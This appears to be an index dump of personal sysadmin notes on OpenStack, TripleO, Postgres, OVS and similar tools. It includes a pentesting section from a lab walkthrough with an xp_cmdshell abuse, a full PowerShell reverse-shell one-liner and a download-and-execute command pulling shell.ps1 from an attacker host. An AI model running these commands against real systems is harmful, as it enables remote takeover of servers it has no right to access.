    openstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\nopenstack flavor create --ram 16384 --disk 21 --vcpus 8 \\\n--private \\\n--project $PROJECT_ID_HERE \\\n--property aggregate_instance_extra_specs:$HOST_AGG_NAME_HERE='true' \\\n--property hw:cpu_policy='dedicated' \\\n--property hw:cpu_thread_policy='prefer' \\\n--property hw:mem_page_size='1GB' \\\n--property hw:numa_cpus.0='1-7' \\\n--property hw:numa_cpus.1='0' \\\n--property hw:numa_mem.0='8192' \\\n--property hw:numa_mem.1='8192' \\\n--property hw:numa_mempolicy='strict' \\\n--property hw:numa_nodes='2' \\\nTEST\n
    "},{"location":"openstack/#create-vm","title":"Create VM","text":"
    openstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-1\nopenstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-2\n
    "},{"location":"openstack/#compute-node-requirements","title":"Compute node requirements","text":"
    https://docs.openstack.org/nova/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-option1-rdo.html\n
    "},{"location":"openstack/#create-a-external-network-with-a-subnet-attached-to-that-network","title":"Create a external network with a subnet attached to that network.","text":"
    neutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n
    "},{"location":"openstack/#random-commands","title":"Random commands","text":"
    #Create image\nopenstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n\n#Create flavor\nopenstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\n#Create network\nopenstack network create network-floating-ip1\nopenstack floating ip create --subnet floating-ip-1\n\n#Create provider network with vlan\nopenstack network create --share --provider-physical-network provider --provider-network-type vlan provider1\n
    /etc/hosts\n\n10.12.0.2     controller01\n\n10.12.0.3       compute01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.3       compute01\n\n10.12.0.2       controller01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.4       compute02\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.5       compute03\n\n################################\n\n10.12.0.5       compute03\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.4       compute02\n
    Placeholder password : openstack2019\n\nRABBIT_PASS : openstack2019\nrabbitmqctl add_user openstack openstack2019\n\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'localhost' \\\nIDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'%' \\\nIDENTIFIED BY 'openstack2019';\n\n\nconnection = mysql+pymysql://keystone:openstack2019@controller01/keystone\n\n\nkeystone-manage bootstrap --bootstrap-password openstack2019 \\\n  --bootstrap-admin-url http://controller01:5000/v3/ \\\n  --bootstrap-internal-url http://controller01:5000/v3/ \\\n  --bootstrap-public-url http://controller01:5000/v3/ \\\n  --bootstrap-region-id RegionOne\n\n\nexport OS_USERNAME=admin\nexport OS_PASSWORD=openstack2019\nexport OS_PROJECT_NAME=admin\nexport OS_USER_DOMAIN_NAME=Default\nexport OS_PROJECT_DOMAIN_NAME=Default\nexport OS_AUTH_URL=http://controller01:5000/v3\nexport OS_IDENTITY_API_VERSION=3\n\n\n\nopenstack domain create --description \"Test Domain\" example\n\nopenstack project create --domain default \\\n  --description \"Service Project\" service\n\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nwww_authenticate_uri  = http://controller01:5000\nauth_url = http://controller01:5000\nmemcached_servers = controller01:11211\nauth_type = password\nproject_domain_name = Default\nuser_domain_name = Default\nproject_name = service\nusername = glance\npassword = openstack2019\n\n\n\n### Deploy Compute NOVA service on Controller node.\n
    CREATE DATABASE nova_api;\nCREATE DATABASE nova;\nCREATE DATABASE nova_cell0;\nCREATE DATABASE placement;\n\n\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nopenstack user create --domain default --password-prompt nova\n\nopenstack role add --project service --user nova admin\n\n\nopenstack service create --name nova \\\n  --description \"OpenStack Compute\" compute\n\nopenstack endpoint create --region RegionOne \\\n  compute public http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute internal http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute admin http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  placement public http://controller01:8778\n\nopenstack endpoint create --region RegionOne \\\n  placement internal http://controller01:8778\n\n\nopenstack endpoint create --region RegionOne \\\n  placement admin http://controller01:8778\n\n\nmodprobe br_netfilter\necho \"$(sysctl -w net.bridge.bridge-nf-call-iptables=1)\" >> /etc/sysctl.conf\necho \"$(sysctl -w net.bridge.bridge-nf-call-ip6tables=1)\" >> /etc/sysctl.conf\nsysctl -p /etc/sysctl.conf\n\n\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nopenstack endpoint create --region RegionOne \\\n  network public http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network internal http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network admin http://controller01:9696\n\n\nopenstack subnet create --network provider \\\n  --allocation-pool start=10.13.0.100,end=10.13.0.200 \\\n  --dns-nameserver 10.13.0.1 --gateway 10.13.0.1 \\\n  --subnet-range 10.13.0.0/24 provider\n\n\n\nopenstack server create --flavor m1.nano --image cirros \\\n  --nic net-id=dee9dde7-0edb-4311-a06e-5ffb98144527 --security-group default \\\n  provider-instance\n\n\nnova-manage cell_v2 map_cell0\nnova-manage db sync\n
    "},{"location":"openvpn/","title":"OpenVPN","text":""},{"location":"openvpn/#connect-to-a-remote-server","title":"Connect to a remote server","text":" 
    sudo openvpn --config s2s-client.ovpn --daemon --status /var/log/openvpn-status 5\n
    "},{"location":"opnfv/","title":"OPNFV","text":""},{"location":"opnfv/#random-notes","title":"Random notes","text":"

    Source : https://readthedocs.org/projects/opnfv-yardstick/downloads/pdf/stable-hunter/

    Yardstick GUI : http://10.10.99.43:8888/gui/index.html (Need the full path)

    #Main folder\n/home/opnfv/repos/yardstick\n#Workspace\n/tmp/workspace/yardstick\n
    "},{"location":"ovs/","title":"OVS","text":""},{"location":"ovs/#openstack-ovs-concepts","title":"Openstack OVS concepts","text":"

    br-int

    br-tun

    br-ext

    "},{"location":"ovs/#useful-commands","title":"Useful commands","text":"
    ovs-vsctl list interface\novs-vsctl list port\novs-vsctl show\novs-appctl fdb/show mybridge\n

    Show all OVS Bridges (OVS Bridges are virtual switches that are linking different ports creating in each switch)

    ovs-vsctl show\n

    List interfaces/ports attached to a bridge

    ovs-vsctl list-ifaces br-int\n
    "},{"location":"pentest/","title":"Pentesting","text":""},{"location":"pentest/#recon","title":"RECON","text":""},{"location":"pentest/#windows-commands","title":"Windows commands","text":"

    Output the contents of a file

    type potato\n

    Show current user

    whoami\n
    "},{"location":"pentest/#nmap","title":"NMAP","text":"

    Find TCP ports that are active

    ports=$(nmap -p- --min-rate=1000 -T4 $TARGET_IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//)\n\nnmap -p- --min-rate=1000 -T4 $TARGET_IP -v\n

    Scan the ports that we're found + service detection.

    nmap -sC -sV -p$ports $TARGET_IP\n\nlaurentdumont@cr300-kali:~$ nmap -sC -sV -p 1433 10.10.10.27\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 12:37 EST\nNmap scan report for 10.10.10.27\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE  VERSION\n1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM\n| ms-sql-ntlm-info: \n|   Target_Name: ARCHETYPE\n|   NetBIOS_Domain_Name: ARCHETYPE\n|   NetBIOS_Computer_Name: ARCHETYPE\n|   DNS_Domain_Name: Archetype\n|   DNS_Computer_Name: Archetype\n|_  Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-11-06T18:53:07\n|_Not valid after:  2050-11-06T18:53:07\n|_ssl-date: 2020-11-12T18:56:28+00:00; +1h18m29s from scanner time.\n\nHost script results:\n|_clock-skew: mean: 1h18m28s, deviation: 0s, median: 1h18m28s\n| ms-sql-info: \n|   10.10.10.27:1433: \n|     Version: \n|       name: Microsoft SQL Server 2017 RTM\n|       number: 14.00.1000.00\n|       Product: Microsoft SQL Server 2017\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 1433\n
    "},{"location":"pentest/#smb-file-sharing","title":"SMB (file sharing)","text":"

    List Shares

    smbclient -N -L \\\\\\\\$TARGET_IP\\\\\n

    Connect to Share

    smbclient -N \\\\\\\\$TARGET_IP\\\\backups\n

    Get files from share

    laurentdumont@cr300-kali:~$ smbclient -N \\\\\\\\10.10.10.27\\\\backups\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Tue Nov 10 17:21:13 2020\n  ..                                  D        0  Tue Nov 10 17:21:13 2020\n  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020\n  user.txt                            A       32  Tue Feb 25 09:37:36 2020\n\n                10328063 blocks of size 4096. 7108669 blocks available\n\nsmb: \\> get user.txt\ngetting file \\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)\n
    "},{"location":"pentest/#using-imppacket","title":"Using ImpPacket","text":"
    git clone https://github.com/SecureAuthCorp/impacket\n# Move the utility from ./examples into the root folder\n\n# Run the utility\npython3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth\n\n# OR INSTALL ALL EXAMPLES (execute in project root folder)\npip3 install .\n
    "},{"location":"pentest/#microsoft-sql","title":"Microsoft SQL","text":""},{"location":"pentest/#check-if-user-is-admin","title":"Check if user is admin","text":"
    SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')\n\n\n-----------   \n\n          1   \n

    IF 1 user is admin.

    "},{"location":"pentest/#validate-in-which-context-sql-server-is-running-and-enable-the-xp_cmdshell-module","title":"Validate in which context SQL Server is running and enable the 'xp_cmdshell' module.","text":"
    EXEC sp_configure 'Show Advanced Options', 1;\nreconfigure;\nsp_configure;\n\nEXEC sp_configure 'xp_cmdshell', 1\nreconfigure;\nxp_cmdshell \"whoami\"\n\nSQL>  xp_cmdshell \"whoami\" \noutput                                                                             \n\n--------------------------------------------------------------------------------   \n\narchetype\\sql_svc                                                                  \n\nNULL\n
    "},{"location":"pentest/#netcat-nc","title":"NETCAT (nc)","text":"

    Create a listener on tcp port 443

    sudo nc -lvnp 443\n
    "},{"location":"pentest/#windows-shell","title":"Windows Shell","text":"

    Attempt to connect to a listener and open a shell using TCP port 443. You need to replace the IP of the machine that is listening (with nc for example)

    $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.3\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"# \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() \n

    Execute the command on the SQL server. This will attempt to get the shell.ps1 file and execute it in the context of the user running the SQL server.

    xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.53/shell.ps1\\\");\"\n
    "},{"location":"pentest/#burp","title":"BURP","text":""},{"location":"pentest/#burp-intruder-sniper","title":"BURP Intruder Sniper","text":"
    GET /cdn-cgi/login/admin.php?content=accounts&id=\u00a7param1\u00a7 HTTP/1.1\nHost: 10.10.10.28\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: user=34322; role=admin\nConnection: close\n
    "},{"location":"pentest/#privilege-escalation-flow","title":"Privilege escalation flow","text":""},{"location":"pentest/#information-gathering","title":"Information gathering","text":"

    Get OS version

    lsb_release -a\n

    Get Kernel version

    uname -a\n

    Get current user info

    id\n
    "},{"location":"postgres/","title":"Postgres","text":""},{"location":"postgres/#connect-to-a-database","title":"Connect to a database","text":"
    psql -h 192.168.2.40 -U postgres hq_data\n
    "},{"location":"postgres/#create-a-database-and-a-user-with-admin-privileges","title":"Create a database and a user with admin privileges","text":"
    sudo apt-get install postgresql postgresql-client\nsudo -u postgres psql\ncreate database netbox;\ncreate user netbox_user with encrypted password 'test';\ngrant all privileges on database netbox to netbox_user;\n
    "},{"location":"postgres/#create-read-only-user","title":"Create Read only user","text":"
    CREATE ROLE read_only_user WITH LOGIN PASSWORD 'vKDHrGZuhH6vNf01VdyJ' \nNOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE NOREPLICATION VALID UNTIL 'infinity';\n\\connect hq_data;\n\nGRANT CONNECT ON DATABASE hq_data TO read_only_user;\nGRANT USAGE ON SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO read_only_user;\nREVOKE CREATE ON SCHEMA public FROM PUBLIC;\n\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO read_only_user;\n
    "},{"location":"postgres/#show-databases","title":"Show databases","text":"
    postgres=# \\l\n                                  List of databases\n   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   \n-----------+----------+----------+-------------+-------------+-----------------------\n ara       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +\n           |          |          |             |             | postgres=CTc/postgres+\n           |          |          |             |             | ara_user=CTc/postgres\n postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | \n template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n(4 rows)\n
    "},{"location":"postgres/#show-users","title":"Show users","text":"
    ara=> \\du\n                                   List of roles\n Role name |                         Attributes                         | Member of \n-----------+------------------------------------------------------------+-----------\n ara_user  | Create DB                                                  | {}\n postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}\n
    "},{"location":"postgres/#show-tables","title":"Show tables","text":"
    SELECT *\nFROM pg_catalog.pg_tables\nWHERE schemaname != 'pg_catalog' AND \n    schemaname != 'information_schema';\n
    "},{"location":"postgres/#describe-a-table","title":"Describe a table","text":"
    \\d TABLE NAME\n
    "},{"location":"postgres/#drop-table","title":"Drop table","text":"
    drop table hq_electricity_consumption ;\n
    "},{"location":"postgres/#show-active-user-sessions","title":"Show active user sessions","text":"
    select pid as process_id, \n       usename as username, \n       datname as database_name, \n       client_addr as client_address, \n       application_name,\n       backend_start,\n       state,\n       state_change\nfrom pg_stat_activity;\n
    "},{"location":"prometheus/","title":"Prometheus","text":"
    #Docker volume - Prometheus config\nsudo docker volume create prometheus-config\n\n#Docker volume - Prometheus metrics and adata\nsudo docker volume create prometheus-data\n\nsudo docker run -d -p 9090:9090 -v prometheus-config:/prometheus-config -v prometheus-data:/prometheus prom/prometheus --config.file=/prometheus-config/prometheus.yml\n

    Grafana container

    sudo docker volume create grafana-config\nsudo docker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  -e \"GF_SECURITY_ADMIN_PASSWORD=PASSWORD_HERE\" \\\n  grafana/grafana\n

    Blackbox exporter

    docker run --rm -d -p 9115:9115 --name blackbox_exporter -v `pwd`:/config prom/blackbox-exporter:master --config.file=/config/blackbox.yml\n
    "},{"location":"proxmox/","title":"Proxmox","text":""},{"location":"proxmox/#user-and-permission-management","title":"User and permission management","text":""},{"location":"proxmox/#full-admin-over-specific-vms","title":"Full admin over specific VMs","text":"
    # Pool + VM are inside that pool.\n# Assume that the user already exists and we want to allow permissions on a specific group of VM.\npveum groupadd po-vm-group -comment \"PO VMs only\"\npveum aclmod /pool/PO-POOL-1/ -group po-vm-group -role PVEAdmin\npveum usermod riyoth@pam -group po-vm-group\n
    "},{"location":"python/","title":"Python","text":""},{"location":"python/#install-latest-python-on-ubuntu-side-by-side-with-os-version","title":"Install latest python on Ubuntu side by side with OS version","text":"
    sudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt install python3.13-full\npython3.13 --version\n
    "},{"location":"python/#profiling-a-python-application","title":"Profiling a python application.","text":"
    pip3 install line_profiler\n

    Add the @profile to each function that is to be profiled

    # Use the decorator\n@profile\ndef some_func(*args, **kwargs)\n    ...\n

    Start the profiling process

    python3 -m line_profiler tag-exporter.py.lprof\n
    Timer unit: 1e-06 s\n\nTotal time: 2e-06 s\nFile: tag-exporter.py\nFunction: __init__ at line 13\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    13                                               @profile\n    14                                               def __init__(self):\n    15         1          2.0      2.0    100.0          self._endpoint = '6666'\n\nTotal time: 14.99 s\nFile: tag-exporter.py\nFunction: collect at line 17\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    17                                               @profile\n    18                                               def collect(self):\n    19         5        115.0     23.0      0.0          GITLAB_PROJECTS_ID_LIST = os.getenv('GITLAB_PROJECTS_ID').split(',')\n    20         5         47.0      9.4      0.0          GITLAB_API_TOKEN = os.getenv('GITLAB_API_TOKEN')\n    21                                           \n    22         5      25743.0   5148.6      0.2          gl = gitlab.Gitlab('https://gitlab.gitlab.maker.studio', private_token=GITLAB_API_TOKEN, ssl_verify=False)\n    23                                           \n    24                                           \n    25        23         28.0      1.2      0.0          for project_id in GITLAB_PROJECTS_ID_LIST:\n    26        19    4103967.0 215998.3     27.4              project = gl.projects.get(project_id)\n    27        19    2781067.0 146371.9     18.6              tags = project.tags.list(per_page='1')\n    28                                                       # Get most recent tag - the tag list is returned \n    29        19        189.0      9.9      0.0              latest_tag = tags[0]\n    30                                           \n    31                                           \n    32        19         66.0      3.5      0.0              gitlab_tag_metric = Metric('gitlab_tag_version',\n    33        19        494.0     26.0      0.0          'Latest Gitlab tags for the project', 'summary')\n    34        19         73.0      3.8      0.0              gitlab_tag_metric.add_sample('gitlab_tag_version',\n    35        19        822.0     43.3      0.0          value='0', labels={'tag_version':str(latest_tag.name), 'project_name':str(project.name)})\n    36        19         51.0      2.7      0.0              yield gitlab_tag_metric\n    37                                           \n    38                                                       # Get the .gitlab-ci.yml from reach project in order to validate the target from the releases\n    39        18    4162769.0 231264.9     27.8              file_content = project.files.raw('.gitlab-ci.yml', 'master')\n    40        18    3913465.0 217414.7     26.1              test = yaml.safe_load(file_content)\n    41       144        132.0      0.9      0.0              for library_name, version_value in test['variables'].items():\n    42       126         85.0      0.7      0.0                  if 'VERSION' in library_name:\n    43        54         32.0      0.6      0.0                      library_version = version_value\n    44        54         39.0      0.7      0.0                      project_version_req = Metric('project_version_req',\n    45        54        287.0      5.3      0.0                      'Project versions requirements in Master branch', 'summary')\n    46        54         39.0      0.7      0.0                      project_version_req.add_sample('project_version_req',\n    47        54        432.0      8.0      0.0                      value='0', labels={'project':str(project.name), 'library_name':str(library_name),'target_version':str(library_version)})\n    48        54         38.0      0.7      0.0                      yield project_version_req\n
    "},{"location":"rasppi/","title":"RaspPi","text":"
    /home/user/.config/autostart/.desktop\n\n[Desktop Entry]\nType=Application\nExec=lxterminal -e \"vlc --fullscreen --loop --no-osd /home/bacon/Documents/ccop-loop.mp4\"\n
    "},{"location":"security/","title":"Security","text":""},{"location":"security/#disable-rpcbind","title":"Disable RPCBind.","text":"
    systemctl stop rpcbind.socket\nsystemctl disable rpcbind.socket\nsystemctl stop rpcbind\nsystemctl disable rpcbind\nnetstat -punta | grep 111\n
    "},{"location":"splunk/","title":"Splunk","text":""},{"location":"splunk/#_1","title":"Splunk","text":"

    Clear the splunk index and all data gathered. Will delete most of the existing data!

    cd /opt/splunk/bin\n./splunk stop\n./splunk clean eventdata\n./splunk start\n
    "},{"location":"terraform/","title":"Terraform","text":""},{"location":"terraform/#deployment-flow","title":"Deployment flow","text":"
    terraform init\nterraform apply\n
    "},{"location":"terraform/#terraform-debug","title":"Terraform debug","text":"
    TF_LOG=DEBUG OS_DEBUG=1 terraform apply\n
    "},{"location":"tripleo/","title":"Tripleo","text":""},{"location":"tripleo/#update-all-the-system-packages-first","title":"Update all the system packages first","text":"
    yum update\n
    "},{"location":"tripleo/#undercloud-deployment","title":"Undercloud deployment","text":"
    sudo useradd stack\nsudo passwd stack  # specify a password\n\necho \"stack ALL=(root) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers.d/stack\nsudo chmod 0440 /etc/sudoers.d/stack\n\nsu - stack\n
    "},{"location":"tripleo/#get-the-packages-for-centos","title":"Get the packages for Centos","text":"
    sudo yum install -y https://trunk.rdoproject.org/centos7/current/python2-tripleo-repos-0.0.1-0.20191108012952.2655019.el7.noarch.rpm\n
    "},{"location":"tripleo/#install-the-rocky-repository","title":"Install the Rocky repository","text":"
    sudo -E tripleo-repos -b stein current\n
    "},{"location":"tripleo/#get-the-tripleo-cli-client-lots-of-stuff-to-install","title":"Get the TripleO CLI client (lots of stuff to install)","text":"
    sudo yum install -y python-tripleoclient\n
    "},{"location":"tripleo/#copy-the-default-deployment-template","title":"Copy the default deployment template","text":"
    cp /usr/share/python-tripleoclient/undercloud.conf.sample ~/undercloud.conf\n
    "},{"location":"tripleo/#deploy-the-undercloud","title":"Deploy the Undercloud","text":"
    openstack undercloud install\n
    "},{"location":"tripleo/#add-dns-to-overcloud","title":"Add DNS to Overcloud","text":"
    (undercloud) [stack@director ~]$ openstack subnet list\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| ID                                   | Name            | Network                              | Subnet          |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| 08a306ed-a5e8-47cd-ac66-a67722d03a42 | ctlplane-subnet | fcda1208-3d2c-4b9c-a241-c4bcd0479b9f | 192.168.24.0/24 |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n\nopenstack subnet set 08a306ed-a5e8-47cd-ac66-a67722d03a42 --dns-nameserver 8.8.8.8\n
    "},{"location":"tripleo/#overcloud-deployment","title":"Overcloud Deployment","text":"
    export DIB_YUM_REPO_CONF=\"/etc/yum.repos.d/delorean*\"\n\n#Build the images for the Overcloud\nopenstack overcloud image build\n\n# Upload the images\nopenstack overcloud image upload\n
    "},{"location":"tripleo/#register-the-nodes","title":"Register the nodes","text":"

    The instackenv.json file.

    {\n    \"nodes\": [\n        {\n            \"mac\":[\n                \"52:54:00:25:ca:d3\"\n            ],\n            \"name\": \"ooo-controller001\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16001\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1a:cc:2a\"\n            ], \n            \"name\": \"ooo-controller002\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16002\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1c:0c:94\"\n            ],\n            \"name\": \"ooo-controller003\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16003\"\n        }\n    ]\n}\n
    "},{"location":"tripleo/#create-the-nodes-within-ironic-openstack","title":"Create the nodes within Ironic Openstack","text":"
    openstack overcloud node import instackenv.json\n
    "},{"location":"tripleo/#ironic-paths","title":"Ironic paths","text":"
    #DNSMASQ\n/var/lib/ironic-inspector/dhcp-hostsdir\n#Ironic PXE\n/var/lib/ironic/httpboot/\n
    "},{"location":"tripleo/#list-nodes","title":"List nodes","text":"
    openstack baremetal node list\n
    "},{"location":"tripleo/#start-introspection","title":"Start introspection","text":"
    openstack overcloud node introspect --all-manageable\n\n# One node\nopenstack overcloud node introspect 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#if-introspection-works-make-nodes-available","title":"If introspection works, make nodes available","text":"
    openstack overcloud node provide --all-manageable\n
    "},{"location":"tripleo/#deploy-overcloud","title":"Deploy Overcloud","text":"
    openstack overcloud deploy --templates\n
    "},{"location":"tripleo/#get-extra-hardware-specs-from-ironic","title":"Get extra-hardware-specs from Ironic.","text":"
    openstack baremetal introspection data save 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#delete-deployed-overcloud","title":"Delete deployed Overcloud","text":"
    (undercloud) [stack@ooo-director ~]$ openstack stack list\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| ID                                   | Stack Name | Project                          | Stack Status       | Creation Time        | Updated Time |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| a078f570-c4fa-46bc-87d5-ebb2c99684e4 | overcloud  | 8a6fa7c4e66a422281bd800007c65e4d | CREATE_IN_PROGRESS | 2019-12-26T04:00:21Z | None         |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n\n#Might need to do 2-3 times... (not sure why)\n(undercloud) [stack@ooo-director ~]$ openstack stack delete a078f570-c4fa-46bc-87d5-ebb2c99684e4\nAre you sure you want to delete this stack(s) [y/N]? y\n\n\nopenstack overcloud plan delete overcloud\n
    "},{"location":"tripleo/#list-overcloud-nodes-profiles","title":"List Overcloud nodes profiles","text":"
    openstack overcloud profiles list\n
    "},{"location":"tripleo/#set-computecontroller-profile","title":"Set compute/controller profile","text":"
    openstack baremetal node set --property capabilities='profile:compute,boot_option:local' \n
    "},{"location":"vmware/","title":"Vmware","text":"
    1  df -h\n2  cd /storage/log/\n3  ls\n4  cd vmware/\n5  ls\n6  du -a /var | sort -n -r | head -n 10\n7  du h-a /var | sort -n -r | head -n 10\n8  df -h\n9  cd ..\n

    10 du h-a /var | sort -n -r | head -n 10 11 cd /var/log/ 12 ls 13 du -ha /var | sort -n -r | head -n 10 14 ls -alh 15 cd vmware 16 ls 17 du -ha /var | sort -n -r | head -n 10 18 ls -alh 19 du -ha /var | sort -n -r | head -n 100 20 ls -alh /storage/log/vmware/sso/tomcat/ 21 du -hs /storage/log/vmware/sso/tomcat/ 22 du -hs /storage/log/vmware 23 du -hs /storage/log/vmware/eam/ 24 du -hs /storage/log/vmware/lookupsvc/ 25 du -hs /storage/log/vmware/lookupsvc/tomcat/ 26 ls -alh /storage/log/vmware/lookupsvc/tomcat/ 27 du -hs /storage/log/vmware/lookupsvc/tomcat/ 28 rm /storage/log/vmware/lookupsvc/tomcat/localhost_access.2021- 29 df -h 30 /usr/lib/vmware-vmca/bin/certificate-manager 31 cat /var/log/vmware/vmcad/certificate-manager.log 32 ping colo.coldnorthadmin.com 33 /usr/lib/vmware-vmca/bin/certificate-manager 34 ping 10.199.199.1 35 dig google.ca 36 dig colo.coldnorthadmin.com 37 dig vcenter.colo.coldnorthadmin.com 38 clear 39 /usr/lib/vmware-vmca/bin/certificate-manager 40 cd/etc/vmware-sso 41 cd /etc/vmware-sso 42 ls 43 cd keys/ 44 ls 45 history | grep 